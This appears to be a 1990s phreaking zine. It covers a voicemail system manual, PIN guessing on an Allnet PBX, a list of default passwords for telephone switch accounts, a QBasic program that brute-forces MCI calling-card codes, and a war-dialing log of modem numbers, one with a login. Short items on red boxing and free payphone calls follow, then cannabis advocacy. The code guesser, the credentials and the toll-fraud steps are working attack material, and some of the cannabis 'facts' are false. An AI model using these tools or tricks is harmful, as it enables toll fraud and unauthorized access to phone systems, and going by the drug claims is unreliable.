- ■ Greetings: Your primary or alternate greeting is played to callers when
- they reach your mailbox.
-
- ■ Directory Name: Your recorded name is used to identify you in the directory
- and to verify your mailbox number when messages are addressed to you by
- non-subscribers and other subscribers.
-
- ■ Password: Your password is ued to prevent unauthorized acceses to your
- mailbox.
-
- ■ Message Envelope Contents: Each message is preceded by an "envelope" message
- that can be programmed to include time/date the message was left, the
- source of the message, and/or the length of the message.
-
- To Program Personal Options:
-
- ── Enter your mailbox #.
- ── Press 4 to select Personal Options Menu. You may then perfrom any or all
- of the following functions:
-
- To Change Your Personal Greeting:
- ── Press 1
- ── EITHER, Press 1 to record and/or enable your primary greeing.
- ── OR, Press 2 to record and/or enable your alternate greeting.
- ── OR, Press 3 to enable the system default mailbox greeting.
- ── If you pressed 1 or 2, the greeting is played.
- EITHER, Press # to accept the greeint. (Or, press 1 if you wish to
- replay the greetiing, press 2 to add to the greeting, or press 3 to
- erase and re-record the greeting.)
- OR, Press * to exit without changing the greeting.
-
- To Change Your Directory Name:
- ── Press 2. Your current name is played. Press 1 to replay your recorded
- name, if desired.
- ── Press 3 to erase and re-record your name.
- ── When you hear a tone, record your first and last name, then press #.
- ── Press # again to accept your recorded name. (Or, press 1 to replay
- your recoreded name, press 2 to add to your name, or press 3 to erase
- and re-record your name.)
-
- To Change Your Password:
- ── Press 3.
- ── Enter a password using digits 0-9 (up to 12 digits).
- ── Press #. Voice Mail plays back your password.
- ── Press # to accept the password as entered. Or, press 3 if you want to
- erase and re-enter your password.
-
- To Change Your Message Envelope:
- ── Press 4.
- ── To enable or disable the time/date option, press 1.
- ── To enable or disable the message source option, press 2.
- ── To enable or disable the message lenght option, press 3.
- ── To enable all options, press 4.
- ── To disable the envelope, press 5.
- ── To accept the envelope, press #.
- ── To return to the Persoanl Options menu without changing the envelope,
- press *.
-
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- <.5.> Remote Messageing and Using The Directory
-
- REMOTE MESSAGING :
-
- To Set Up Remote Messaging:
- ── Enter your mailbox as described in section 2.
- ── Press 5.
- ── Press 1 to set up a Primary destination or press 2 to setup an
- alternate destination. You then have the following options:
-
- To Turn Remote Messaging On Or Off:
- ── Press 1.
- ── If Chosen press 1 to enable pager notification or 2 to enable personal
- notification. Then, press 1 to have it notify you for any new message
- or press 2 to have it notify you on priority messages only.
-
- To Set Up Or Change The Telephone Number:
- ── Press 2.
- ── Dial the telephone number, then press #.
-
- To Set Up The Time Of Day:
- ── Press 3.
- ── When prompted, enter the time at which you wish to have the message
- notification start and stop. Enter the times with two digits for the
- hour and two digits for the minutes. (If you wish to have continous
- notification, enter the same time for the starting and ending. ) If
- entering the time in the 12-hour format you will be promted to press
- 1 for AM or press 2 for PM.
-
- To Set Up The Days Of The Week:
- ── Press 4.
- ── Press 1 for messagin Monday-Friday, press 2 for all days, or press
- 3 to select individual days.
- ── If you selected individual days, you will be prompted to press digits
- 1-7 which correspond to the days Sunday through Saturday. (ie Sunday
- = 1) Press # to accept the days of the week.
-
- To Exit:
- ── Press #.
-
- USING THE DIRECTORY :
-
- The mailbox and extension number directories can be used any time a prompt
- asks you to enter a mailbox number. You use the keypad keys on your phone
- to enter the name. The system then plays the closest matching directory name
- that corresponds to the entry.
-
- To Use The Directory:
- ── Dial the Voice Mail access number.
- ── Press # for Directory Services.
- ── Enter the desired name by pressing a single key on the dial pad for
- each letter of the name, then press #. (The letters match those printed
- on the key. for example pressing 2 to enter A, B, or C.)
- To hear the system play a helpful prompt instructing you how to
- enter a name, press 0 at any time while spelling a name.
-
- ── The selected name is played. Do one of the following:
- -To accept the name press #.
- -To hear the previous name in the directory, press 1.
- -To hear additional information for the selected anem (if allowed),
- press 2.
- -To hear the next name in the directory, press 3.
- -To spell a different name, press 4 and spell a new name as described
- above.
- -To switch the first/last name sort order, press 5.
-
- <.6.> Where Can I Find This System?
-
- To tell you the truth I don't know. There is no way of identifying this
- system from any other. Except for the fact that you cannot get this system
- to tell you that it is an IVX500. So good luck and happy hacking.
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- ─────────────────────
- │My Allnet Discovery│
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- Recently I was trying to call up Hallmark on their Holiday Greeting
- line to use their Prepaid Calling-Card service. But I couldn't remember the
- number. I knew it was around (800) 203-12xx. So I tried 35 as the xx. Which
- I was sure would work and I hear the sweet sound of the Allnet operator's
- recorded voice echoing through my phone "Please Enter Your 4 Digit PiN".
- Hmm, I thought sounds like a PBX. I didn't know anything about it at first
- until I entered 9999 as the PiN. When the operator's voice echoes "Thank You"
- So right now I'm feeling pretty good I found a PBX and got the code on the
- first try. Well it wasn't the right code I wanted. It forwared me to Allnet's
- Customer Service Automed System. Once you get to this hit 2 for the real
- automated service. On that you can find out your account balance with your
- Allnet account number which if you can hack can get you free calls through
- their extender which I will explain later in this article. You can also find
- out find out dialing sequences for dialing domestic and international. Plus
- some other useless shit like finding out mailing addresses to where to send
- you bills. This service can be reached without going through a PBX by calling
- (800) 536-3273.
- Now back to the PBX hacking. After that customer service discovery I
- tried a number. Then I hear enter my 4 digit PiN again. The second try I did
- it again and hear "One Moment Please". I thought jackpot. But then hear
- "You must enter a valid Pin for placing your call". Rats foiled again. Thats
- how I knew it was a PBX. I was thinking how lucky I was to have found a PBX
- for a mass telco so luckily. Little did I know theirs a million of these
- around. And some are fucked up so after entering 2 invalid pins it transfers
- you to someones residence! Incase your wondering one of those numbers is
- (800) THE-KRAD (843-5723). At the end of this article will be a small list of
- numbers for this service.
- For their extender just dial on up (800) 783-1444. Then with your
- touchtone phone dial that numbers. Then at the first single tone dial
- 0-NPA-PRE-SUFF. You can call international. Then at the second double tone
- enter your 11 digit Allnet account number and your call will be billed to
- you Allnet account.
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- List oF Numbers
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- (800) xxx-xxxx
- (800) 203-1235
- (800) THE-KRAD
- (800) 868-5995
- (800) 868-1362
- (800) 868-1366
- (800) 868-0586
- (800) 868-3210
- (800) 868-0056
- (800) 868-5083
- (800) 868-1974
- (800) 868-2218
- (800) 868-3580
- (800) 868-5028
- (800) 868-4624
- (800) 868-1666
- (800) 325-4073
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- By Ser:
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- cust custpw - Highest acct privlege
- rcust rcustpw - Restricted cust acct (Still good)
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- browse browsepw - Pretty Much shit
- browse looker - Shit
- maint rwmaint
- LOCATE locatepw
- tech field
- inads inads
- inads indspw
- inads inadspw
- support supportpw
- bcim bcimpw
- bciim bciimpw
- enquiry enquirypw
- init initpw
- bcms bcms
- bcms bcmspw
- craft craftpw
- craft crack
- blue bluepw
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- We've found a few in 518, but we aint giving them out, cause if we do there
- will be about 500+ wanna be 518 hackers fucking it up for us... But we will
- give you one in 5o3.... here ya go 5o3-223-5340, it still uses cust and rcust
- for defualts, so you can check it out.. Late
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- A Simple MCi Code Hacker By Substance
-
- Check this prog out, i wrote this with some spare time, you should substitute
- your correct comport for the comport given defaulted. Exaclty what this will
- do is, call the 95o-1o22 # (For MCi's PBX) and dial in a random MCi Code
- (excluding starting 0's and 1's) Then will dial a # that will never be busy
- with a modem obviously (like i think it's compusrv) Then wait a few sec's.
- If it see's the word CONNECT it writes the code to file. All tho this isnt
- the most accurate way of hacking MCi codes, this has about a 10 out of 100
- chance of getting home.. Try it out, if your not completly satisfied, fuck off
-
- - Substance
-
- ------------------------------------------------------------------------------
- ON ERROR GOTO ED
-
- BEGIN:
- RANDOMIZE TIMER
- CLOSE
-
- HACK$(3) = "14" ' CODE LENGTH
- SCAN$(8) = "40" ' SECONDS TO WAiT FOR CoNNECT
-
- OPEN "COM2:2400,N,8,1" FOR RANDOM AS #1: OPEN "CON" FOR OUTPUT AS #2: OPEN "VALIDS.DAT" FOR APPEND AS #3
-
- 1
- CLS
- COLOR 11: PRINT " MCi LD K0DE HACKER"
- COLOR 11: PRINT "■"; : COLOR 9: PRINT " iNiTiALiZiNG MoDeM ": PRINT #1, "ATS11=80": SLEEP 3
- COLOR 3: PRINT "■"; : COLOR 9: PRINT " DiALiNG MCi"
-
-
-
- 4
- a$ = INKEY$
- TOTAL$ = "": Q$ = "" ' CLEAR MODEM BUFFER
- NUMS$ = "" ' CLEAR RANDOM #'S
- LOCATE 4, 1 ' [ ]
- FOR DL = 1 TO VAL(HACK$(3)) ' [ ]
- X = INT(RND * 10) ' [ ]
- IF DL = 1 AND X = 0 THEN X = INT(RND * 9 + 1) ' [ GENERATES ]
- X$ = STR$(X) ' [ RANDOM ]
- X$ = RIGHT$(X$, 1) ' [ #'S ]
- NUMS$ = NUMS$ + X$ ' [ ]
- NEXT DL ' [ ]
- PRINT "HACKiNG CODE " + NUMS$ ' [ ]
-
- PRINT #1, "ATDT9501022,,,,0-8012501600,,," + NUMS$
-
- Starttime = TIMER
- IF a$ = CHR$(27) THEN CLOSE : END
- 2
- a$ = INKEY$
- Timeleft = INT(TIMER - Starttime)
- T$ = INPUT$(LOC(1), #1)
- TOTAL$ = TOTAL$ + T$
-
- IF a$ = CHR$(27) THEN CLOSE : END
-
- IF INSTR(1, TOTAL$, "NO CA") > 0 THEN PRINT "NO CARRiER": GOTO BEGIN
- IF INSTR(1, TOTAL$, "CONN") > 0 THEN PRINT #3, "HACKiNG 95o-1o22 C0DE - " + NUMS$: BEEP: LOCATE 15, 1: PRINT "LAST VALiD CODE " + NUMS$: PRINT #1, "ATZH0": CLOSE #1: OPEN "COM2:19200" FOR RANDOM AS #1: NUMS$ = "": SLEEP 2: TIMEE = 0: GOTO BEGIN
- IF INSTR(1, TOTAL$, "CARR") > 0 THEN PRINT #3, "HACKiNG 95o-1o22 C0DE - " + NUMS$: BEEP: LOCATE 15, 1: PRINT "LAST VALiD CODE " + NUMS$: PRINT #1, "ATZH0": CLOSE #1: OPEN "COM2:19200" FOR RANDOM AS #1: NUMS$ = "": SLEEP 2: TIMEE = 0: GOTO BEGIN
- IF INSTR(1, TOTAL$, "BUSY") > 0 THEN PRINT "BUSY": GOTO BEGIN
- IF a$ = CHR$(27) THEN CLOSE : END
- TIMEE = VAL(SCAN$(8)) - Timeleft
- IF TIMEE < 0 THEN PRINT #1, "ATZH0": CLOSE #1: OPEN "COM2:19200" FOR RANDOM AS #1: GOTO 4
- LOCATE 5, 1
- PRINT TIMEE; " SECONDS LEFT"
- GOTO 2
-
-
-
- END
-
-
- ED:
- IF ERR = 57 THEN RESUME
- PRINT ERR
- PRINT "PLEASE PRESS ENTER ERROR"
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- Scanned By Substance from 12-24-94 up to 01-05-95
-
- Carrier At 459-0022 - Dead ▒≡▒ 12-24-1994 21:59:02
- Carrier At 459-0037 - Dead ▒≡▒ 12-24-1994 22:05:43
- Carrier At 459-0038 - Dead ▒≡▒ 12-24-1994 22:05:45
- Carrier At 459-0166 - ID + PW ▒≡▒ 12-24-1994 23:17:47
- Carrier At 459-0193 - SCo UNiX ▒≡▒ 12-24-1994 23:29:08
- Carrier At 459-0266 - Dead ▒≡▒ 12-25-1994 00:00:12
- Carrier At 459-0270 - TeleSphere BBS ▒≡▒ 12-25-1994 00:01:36
- Carrier At 459-0283 - Needs Acct Id e,7,1 ▒≡▒ 12-25-1994 00:07:06
- Carrier At 459-0294 - Dead ▒≡▒ 12-25-1994 00:11:27
- Carrier At 459-0582 - Sco UniX ▒≡▒ 12-25-1994 02:22:57
- Carrier At 459-0589 - Sco UniX ▒≡▒ 12-25-1994 02:26:07
- Carrier At 459-0602 - Dead ▒≡▒ 12-25-1994 02:31:41
- Carrier At 459-0616 - UniX ▒≡▒ 12-25-1994 02:38:19
- Carrier At 459-0734 - UniX ▒≡▒ 12-25-1994 03:31:24
- Carrier At 459-0740 - Dead ▒≡▒ 12-25-1994 03:33:48
- Carrier At 459-0798 - Dead ▒≡▒ 12-25-1994 04:00:41
- Carrier At 459-0810 - Dead ▒≡▒ 12-25-1994 04:05:42
- Carrier At 459-0811 - Dead ▒≡▒ 12-25-1994 04:05:44
- Carrier At 459-0827 - UniX ▒≡▒ 12-25-1994 04:13:01
- Carrier At 459-0836 - Password Required ▒≡▒ 12-25-1994 04:17:27
- Carrier At 459-1016 - Different Terminal Needed ▒≡▒ 12-25-1994 05:38:02
- Carrier At 459-1024 - Enter Password ▒≡▒ 12-25-1994 05:41:54
- Carrier At 459-1033 - Dead ▒≡▒ 12-25-1994 05:45:51
- Carrier At 459-1070 - 12oo, num ▒≡▒ 12-25-1994 06:02:57
- Carrier At 459-1092 - Dead ▒≡▒ 12-25-1994 06:12:59
- Carrier At 459-1163 - Federal Interstate Bank? ▒≡▒ 12-25-1994 06:44:59
- Carrier At 459-1164 - Dead ▒≡▒ 12-25-1994 06:45:23
- Carrier At 459-1258 - Welcome To Albany, Unix ▒≡▒ 12-25-1994 07:30:34
- Carrier At 459-1354 - Dead ▒≡▒ 12-25-1994 08:14:42
- Carrier At 459-1356 - Dead ▒≡▒ 12-25-1994 08:15:37
- Carrier At 459-1377 - Dead ▒≡▒ 12-25-1994 08:25:38
- Carrier At 459-1508 - Dead ▒≡▒ 12-25-1994 09:38:30
- Carrier At 459-1514 - Dead ▒≡▒ 12-25-1994 09:41:09
- Carrier At 459-1601 - Some very weird system ▒≡▒ 12-25-1994 17:14:14
- Carrier At 459-1740 - UNiX ▒≡▒ 12-27-1994 23:24:54
- Carrier At 459-2003 - Dead ▒≡▒ 12-28-1994 01:24:11
- Carrier At 459-2155 - Dead ▒≡▒ 12-28-1994 02:34:59
- Carrier At 459-2189 - Dead ▒≡▒ 12-28-1994 02:50:49
- Carrier At 459-2233 - Dead ▒≡▒ 12-28-1994 03:11:15
- Carrier At 459-2319 - Dead ▒≡▒ 12-28-1994 03:51:41
- Carrier At 459-2345 - Dead ▒≡▒ 12-28-1994 04:03:43
- Carrier At 459-2661 - Dead ▒≡▒ 12-28-1994 06:31:28
- Carrier At 459-2742 - Dead ▒≡▒ 12-28-1994 07:09:07
- Carrier At 459-2951 - Dead ▒≡▒ 12-28-1994 08:47:08
- Carrier At 459-2959 - Dead ▒≡▒ 12-28-1994 08:51:53
- Carrier At 459-3292 - Dead ▒≡▒ 12-28-1994 14:19:53
- Carrier At 459-3355 - Modem, No Con ▒≡▒ 12-28-1994 14:48:11
- Carrier At 459-3369 - OfficeMax StoreMax ]I[ ▒≡▒ 12-28-1994 14:54:33
- Carrier At 459-3419 - Dead ▒≡▒ 12-28-1994 15:17:52
- Carrier At 459-3424 - Dead ▒≡▒ 12-28-1994 15:19:41
- Carrier At 459-3501 - Dead ▒≡▒ 12-28-1994 16:54:41
- Carrier At 459-3511 - Fax ▒≡▒ 12-28-1994 16:59:44
- Carrier At 459-3554 - UNiX - SYNC SYNC11 ▒≡▒ 12-28-1994 17:21:27
- Carrier At 459-3776 - UNiX ▒≡▒ 12-29-1994 17:19:09
- Carrier At 459-4287 - Different Terminal ▒≡▒ 12-30-1994 03:29:13
- Carrier At 459-4394 - SCoUNiX ▒≡▒ 12-30-1994 04:17:11
- Carrier At 459-4452 - Dead ▒≡▒ 12-30-1994 04:42:00
- Carrier At 459-4892 - Dead ▒≡▒ 12-30-1994 08:03:29
- Carrier At 459-4934 - Different Terminal ▒≡▒ 12-30-1994 08:22:15
- Carrier At 459-5161 - Unix ▒≡▒ 12-30-1994 10:05:24
- Carrier At 459-5176 - Dead ▒≡▒ 12-30-1994 10:11:16
- Carrier At 459-5215 - UNiX - ID: SYNC/SYNC11 ▒≡▒ 12-30-1994 14:00:59
- Carrier At 459-5344 - UNiX ▒≡▒ 01-03-1995 07:48:04
- Carrier At 459-5397 - Different Terminal ▒≡▒ 01-03-1995 08:12:53
- Carrier At 459-5427 - (144) ▒≡▒ 01-03-1995 08:27:07
- Carrier At 459-5524 - Dead ▒≡▒ 01-03-1995 09:12:24
- Carrier At 459-5607 - Dead ▒≡▒ 01-03-1995 09:48:21
- Carrier At 459-5917 - (1200) ▒≡▒ 01-03-1995 12:09:17
- Carrier At 459-6282 - Different Terminal ▒≡▒ 01-03-1995 14:56:32
- Carrier At 459-6337 - Dead ▒≡▒ 01-05-1995 02:11:06
- Carrier At 459-6461 - Dead ▒≡▒ 01-05-1995 03:04:19
- Carrier At 459-6487 - Dead ▒≡▒ 01-05-1995 03:15:10
- Carrier At 459-6538 - Dead ▒≡▒ 01-05-1995 03:36:51
- Carrier At 459-6543 - Dead ▒≡▒ 01-05-1995 03:38:46
- Carrier At 459-6551 - Dead ▒≡▒ 01-05-1995 03:42:12
- Carrier At 459-6588 - Dead ▒≡▒ 01-05-1995 03:57:52
- Carrier At 459-6799 - Dead ▒≡▒ 01-05-1995 05:26:50
- Carrier At 459-6822 - Dead ▒≡▒ 01-05-1995 05:36:56
- Carrier At 459-6916 - Dead ▒≡▒ 01-05-1995 06:15:27
- Carrier At 459-6970 - Special Terminal ▒≡▒ 01-05-1995 06:38:05
- Carrier At 459-6977 - UNiX ▒≡▒ 01-05-1995 06:40:51
- Carrier At 459-6997 - UNiX ▒≡▒ 01-05-1995 06:48:42
- Carrier At 459-7254 - (96oo) ▒≡▒ 01-05-1995 08:54:05
- Carrier At 459-7500 - Dead ▒≡▒ 01-05-1995 10:43:49
- Carrier At 459-7594 - Dead ▒≡▒ 01-05-1995 11:24:01
- Carrier At 459-7718 - (12oo) Says Weird Shit ▒≡▒ 01-05-1995 12:17:23
- Carrier At 459-8059 - Dead ▒≡▒ 01-05-1995 14:41:46
-
-
- This was alot of werk so enjoy it..
-
- Another Scan Done sucessfully by PsychoScan 2.10 (PsychoScan's latest on most
- good FTP sites including ftp.winternet.com, and spy.org. Also on AWoL [518]
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- ──────────────
- │ BTR Shorts │
- ──────────────
- by
- The Whole World
-
- ->■ What are BTR Shorts?
-
- BTR shorts are pieces of info that are too small for their own article
- therefore their short pieces. Hence the name shorts. If you can submit
- a short send to AWoL [518] 383-1369.
-
- ->■ Isn't Pilgrim Telephone (a New England Based Telco) pretty arrogant
- about their collect calling service? I think so.
- By calling
- [800] 382-5288 or [800] FUCK-ATT and
- [800] 382-5624 or [800] FUCK-MCI
-
- You hear a duck quack really loud then you Pilgrim Telephone introduces
- themselves, then you hear "Enter The Number You Wish To Call" Then enter
- ACN and then it'll ask for your name say "Dick" and it'll call that #
- and ask if they'll accept a collect call from Dick. Without you hearing
- the operator + person conversation.
-
- ->■ If you want a sure fire way to red box that always works then listen up.
- In order for this to work you have to have a properly recorded tone. By
- dialing up any 10xxx (tenex) code plus 1+ACN. Then it asks you for a
- shit load of money. Like $1.35 for a local call. But since it isn't
- monitored theres nothing there to monitor how many coins have been
- dropped in.
-
- ->■ New AC's in '95
- 281 - Texas
- 334 - Alabama
- 360 - Washington
- 423 - Tennessee
- 456 - International Inbound
- 500 - Personal Communications Services (A SAC or Special Area Code)
- 520 - Arizona
- 540 - Virginia
- 562 - California
- 630 - Illinois
- 954 - Florida
- 970 - Colorado
-
-
- ->■ A Brief List of 10XXX (Tenex) Codes.
- 10222 - MCi
- 10245 - RCi
- 10288 - AT&T
- 10333 - Sprint
- 10444 - AllNet
- 10488 - Metromedia
- 10532 - Joker Communications
- 10533 - Joker Communications
- 10555 - Wiltel
- 10658 - Wiltel
- 10732 - AT&T
- 10789 - Metromedia
- 10811 - VarTec Telecom
- 10880 - Opticom
-
- ->■ Quick answer this :
-
- True or False you can always make free calls from a Cocot?
-
- In the words of OJ Simpson, Absolutely, Positevely 100 percent TRUE.
- If your waiting for DT trick doesnt work then use your autodialer or
- keypad. But if that doesn't work call up the operator (0) then ask for
- a long distance carrier, ie : ATT. Then say I need assistance in a call
- say the #, you can't do 900's but you can do 800's and LD, + INTL. That
- usually works. Sometimes that even works on badly programmed Bell
- phones.
-
- [-BEGIN.ADD-]
- ->■ HEMP CAN SAVE THE WORLD!
- Cannabis hemp is known today primarily for its widespread use as a
- recreational drug: Cannabis flowers when smoked or ingested produce
- euphoric effects. Current gross domestic sales of marijuana are
- estimated at $30 billion...
- What is less well known is that hemp is an invaluable and enviromentally
- friendly resource in many other areas as well. For example: "One acre
- of hemp will make the same amount and quantity of paper as four acres
- of 20 year old trees without the need for chlorine in the bleaching
- process, creating no toxic dioxin pollutants."
- When mature, hemp is the toughest natural fiber known; demin was
- originally made from hemp sailcloth; canvas take its name from the
- word Cannabis (Canvass).
- Hemp can also be used as a fuel. Old USDA reports show Hemp gives 4-10
- times the yield of cellulose per acre compared to corn. Modern
- methods of converting cellulose to methanol make this a viable and
- pollution free method for powering cards, trucks, buses, etc.
- Equally important are the uses of Hemp for food and medicine. Cannabis
- seeds yield as much edible oil per acre as sunflowers do; the pressed
- pulp is second in protein only to that of soy beans. Federal regulations
- in the US prohibit research into additional benificial effects, however
- cannabis is well known to be helpful fro glaucoma, asthma, anorexica
- and stress, potentially replacing half the prescriptions written today.
- And , "...there are simply no credible medical reports to suggest that
- consuming marijuana has caused a single death...". Too bad the same
- can't be said of alcohol or tobacco.
- Today there is growing support for taking the 'crime' out of Cannabis.
- US DA Judge Vaughn Walker notes, "I make no bones about my personal
- view that the best course of action for us to take is exactly the same
- course of action for us to take is exactly the same course we took
- after prohibition. And that is decriminalization."
- Help save the planet. Help legalize Hemp! Cannabis Action Network (CAN)
- works with over 250 organizations worldwide. Call or write today for
- information on events in your area and how you can help.
-
- CANNABIS ACTION NETWORK
- 2560 BANCROFT WAY #46
- BERKELY, CA 94704
-
- (510) 486-8083
- [-END.ADD-]
-
- ->■ 20 Quick Facts On Pot
- 1. Cannabis and hemp are the same.
- "Marijuana" was the Mexican name given to it.
- 2. Cannabis was first cultivated in China around 4000 bc
- 3. The original drafts of the Declaration of Independence were written
- on hemp paper.
- 4. One acre of hemp will produce as much paper as 4 acres of trees.
- 5. Hemp is a source of fiber and cloth and cordage for rope.
- 6. George Washinton and Thomas Jefferson grew hemp. Washington, our
- very first president declared, "Make the most of the hemp seed. Sow
- it everywhere."
- 7. Hemp see is nature's perfect food. The oil from hemp seeds has the
- highest percentage of saturated fats.
- 8. Sterilized hemp seed is commonly sold as bird seed.
- 9. Rolling papers, like Bambu, are made from hemp paper.
- 10. In 1937, the Marijuana Tax Stamp Act prohibited the use, safe and
- cultivation of hemp/marijuana in the United States.
- 11. Five years later, during WWII, the US Dept. of Agriculture released
- the film, "Hemp For Victory," which encouraged American farmers to
- grow hemp for the war effort.
- 12. Hemp is cultivated all over the world. Today, China, Korea, Italy
- Hungary, Russia and France are among the countries that grow hemp
- for fiber, paper and other products.
- 13. Cannabis is classified as a schedule 1 drug by the FDA. Designated
- as a narcotic, it cannot be prescribed by doctors to patients.
- 14. In 1988, the DEA's own administravite law judge concluded that
- "marijuana is one of the safest, therapuetically active substances
- known to man."
- 15. Cannabis can be used as a medicine to treat nausea, pain and muscle
- spasms. It alleviates symptons of glaucoma, MS, AIDS, migranes and
- other debillitating ailmetns.
- 16. 35 states have passed legistation permitting medical use of hemp.
- 17. 12 Americans recieve prescribed marijuana from the US goverment.
- 18. More than 400,000 Americans are arrested each year on marijuana
- charges.
- 19. More than 400,000 Americans die from diseases related to cigarette
- smoking each year. More than 150,000 Americans die of alcohol abuse
- each year. But in 10,000 years of usage no one has ever died from
- the usage of marijuana.
- 20. Packs an awesome buzz.
-
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-
- LSD BUSTED!
- The Liquid Sky Datacom (internet LSD.ORG) is no longer. Sysops Baxter &
- Die Warzau are in jail for letting users post valid CC's in the Cardings
- section. Too bad, LSD was advertised in 2600 mag, had it's own Voice Mail
- System, 3 28.8, and lots of hardware. Shit load of money down the drain.
- I don't know anything else like sentencing because I didn't see the news
- paper article since I don't get that paper.
-
- A Public Service Announcemnt:
-
- To all lamers that call the 2600 Voice BBS and don't post shit :
-
- Hello? Are you alive? The thing is lame but it could be very good. It
- is busy just about 24/7. With only about 3 or less posts a day. I think
- that fucking sucks. So if you call you better have something to say.
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